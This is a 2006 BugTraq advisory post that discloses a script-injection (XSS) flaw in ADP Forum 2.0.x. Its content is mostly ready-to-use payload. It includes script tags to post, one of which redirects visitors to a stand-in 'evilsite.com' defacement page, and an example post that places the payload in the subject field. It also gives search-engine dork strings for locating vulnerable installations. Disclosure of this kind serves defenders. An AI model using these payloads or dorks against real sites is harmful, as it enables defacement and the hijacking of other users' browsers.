BugTraq
ADP Forum 2.0,* script İnjection Mar 09 2006 02:21PM
liz0 bsdmail com
ADP Forum 2.0,* script İnjection
----------------------------------------------------
site:http://www.linux.it/~fedro/
demo:http://www.adp.host.sk/Forum203/
--------------------------------------------------
Post This Code:

<script>alert(/Liz0ziM/)</script>

<script>location.href="http://evilsite.com/deface.html";</script>

vs..
---------------------------------------------------------
Example Post Message :

Name :Liz0ziM
Username :username
Password :password
E-mail :liz0 (at) bsdmail (dot) com [email concealed]
Subject :<script>location.href="http://evilsite.com/deface.html";</script>
Message :LOL :=)

---------------------------------------------------------

Credit:Liz0ziM
Mail :liz0 (at) bsdmail (dot) com [email concealed]
Site :www.biyosecurity.com
BiyoSecurityTeam: Liz0ziM,Codexploder'tq,r00t3rr0r,y3LL0w
------------------------------------------------------------
google:

"ADP Forum 2.0.3 is powered by VzScripts"
"ADP Forum 2.0.2"
"ADP Forum 2.0.1"
"ADP Forum 2.0"

------------------------------------------------------------

Source:

http://www.blogcu.com/Liz0ziM/338614/

http://biyosecurity.be/bugs/adpforum2.html

http://biyosecurity.be/bugs/adpforum2.txt

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus